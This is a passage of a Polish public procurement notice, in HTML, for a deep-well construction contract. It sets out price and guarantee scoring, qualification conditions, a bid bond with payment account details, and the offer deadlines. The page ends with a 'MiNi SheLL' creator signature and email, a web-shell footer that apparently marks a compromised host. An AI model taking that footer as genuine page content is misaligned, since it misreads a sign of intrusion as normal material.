zamówienia, podanej przez Wykonawcę w Formularzu ofertowym (załącznik nr 1 do SWZ).<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej ofercie zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według poniższego wzoru:<br/><br/>C = (Cn: Cb) x 60<br/>gdzie:<br/>C - ilość punktów za kryterium „Cena ofertowa brutto”,<br/>Cn - najniższa cena spośród ofert ocenianych nie podlegających odrzuceniu,<br/>Cb - cena oferty badanej,<br/>60 pkt. - waga (znaczenie) kryterium,<br/><br/>Maksymalna liczba punktów (C) jaką może uzyskać oferta w tym kryterium wynosi 60,00 punktów.<br/><br/>2)	Gwarancja i rękojmia – „G” – waga kryterium (znaczenie): 40% <br/>Maksymalna liczba punktów (G) jaką może uzyskać oferta w tym kryterium wynosi: 40,00 punktów.<br/>Najkrótszy możliwy termin gwarancji wymagany przez Zamawiającego – 24 miesięcy.<br/>Za udzielenie gwarancji na okres Wykonawca otrzyma :<br/>60 miesięcy wykonawca otrzyma – 0 pkt<br/>66 miesięcy wykonawca otrzyma – 20 pkt<br/>72 miesięcy wykonawca otrzyma – 40 pkt<br/>W przypadku zaproponowania przez Wykonawcę okresu gwarancji wynoszącego więcej niż 72 miesięcy oceniona będzie wartość 72 miesięcy.<br/>Oferty z okresem gwarancji jakości krótszym niż 60 miesięcy zostaną odrzucone.<br/><br/>2.	Za ofertę najkorzystniejszą będzie uznana oferta, która przy uwzględnieniu powyższych kryteriów otrzyma najwyższą łączną punktację. Całkowita liczba punktów, jaką może otrzymać dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + G<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „cena ofertowa brutto”,<br/>T – punkty uzyskane w kryterium „gwarancja”;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej;<br/>Zamawiający wymaga wykazania przez Wykonawcę spełniania warunków dotyczących: zdolności technicznej lub<br/>zawodowej:<br/>Zamawiający uzna, iż warunek ten zostanie spełniony jeśli Wykonawca, nie wcześniej niż w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował minimum<br/>jedno zadanie (jedna umowa) na roboty budowlane polegającą na budowie lub modernizacji studni głębinowej o wartości<br/>minimalnej 150.000,000 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, niżej wymienionych oświadczeń lub dokumentów, aktualnych na dzień ich złożenia, potwierdzających okoliczności, o których mowa w art. 273 ust. 1 ustawy Pzp, tj.: <br/>1)	wykaz robót budowlanych polegających na budowie lub modernizacji studni głębinowej o wartości minimalnej 150.000,000 zł brutto minimum jedno zadanie (jedna umowa) - wg. wzoru stanowiącego załącznik nr 3 do SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy opatrzony kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym<br/>(załącznik nr 1 do SWZ).<br/>2. Aktualne na dzień składania ofert oświadczenie podmiotu udostępniającego zasoby opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym lub podpisem zaufanym tego podmiotu (załącznik nr 6 do SWZ) wraz z<br/>zobowiązaniem, o którym mowa w art. 118 Ustawy pzp (JEŻELI DOTYCZY)<br/>3. Pełnomocnictwo – w przypadku podpisania oferty lub<br/>załączników przez osobę, której umocowanie nie wynika<br/>z dokumentów rejestrowych, oferta musi zawierać oryginał stosownego pełnomocnictwa w formie lub postaci elektronicznej<br/>(tj. podpisanego kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub osobistym przez osoby, których<br/>umocowanie wynika z dokumentów rejestrowych) lub elektroniczną kopię pełnomocnictwa poświadczoną<br/>za zgodność z okazanym dokumentem opatrzoną kwalifikowanym podpisem elektronicznym przez notariusza na podstawie<br/>97§2 Prawa<br/>o notariacie.<br/>- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli<br/>każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 58 ustawy Pzp)<br/>4. Dowód wniesienia wadium (zgodnie z zapisami Rozdziału XIII) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający ustala wadium w wysokości: 5.000,00 zł (pięć tysięcy złotych). <br/>2.	Zamawiający żąda wniesienia wadium w pełnej wysokości przed terminem do składania ofert. <br/>3.	Wadium może być wniesione w:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836, 1572). <br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku: 77 9364 0000 2005 2067 4718 0001 w WMBS Pisz z dopiskiem w tytule przelewu: „Wadium w post. PUK-R.ZP 9/2024”.<br/>5.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt 4, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert). <br/>6.	Do oferty należy załączyć: oryginał gwarancji lub poręczenia w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osób upoważnionych do jego wystawienia (wystawców dokumentu) potwierdzający wniesienie wadium w formach, o których mowa w pkt 3. <br/>7.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Ustawy Pzp.<br/>8.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona. <br/>9. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa art. 98 ust. 1 - 5 ustawy Pzp. <br/>10.	Uwaga! W treści gwarancji/poręczenia należy podać dane adresowe oraz adres email wystawcy dokumentu, w celu przesłania oświadczenia o zwolnieniu wadium, o którym mowa w art. 98 ust.5 Ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wspólnej,<br/>oświadczenie to musi złożyć każdy z podmiotów składających wspólną ofertę - Aktualne na dzień składania ofert<br/>oświadczenie Wykonawcy opatrzone kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym (załącznik nr 2 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z par. 11 projektu umowy - zał_4-Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">siedziba Zamawiającego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-30 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com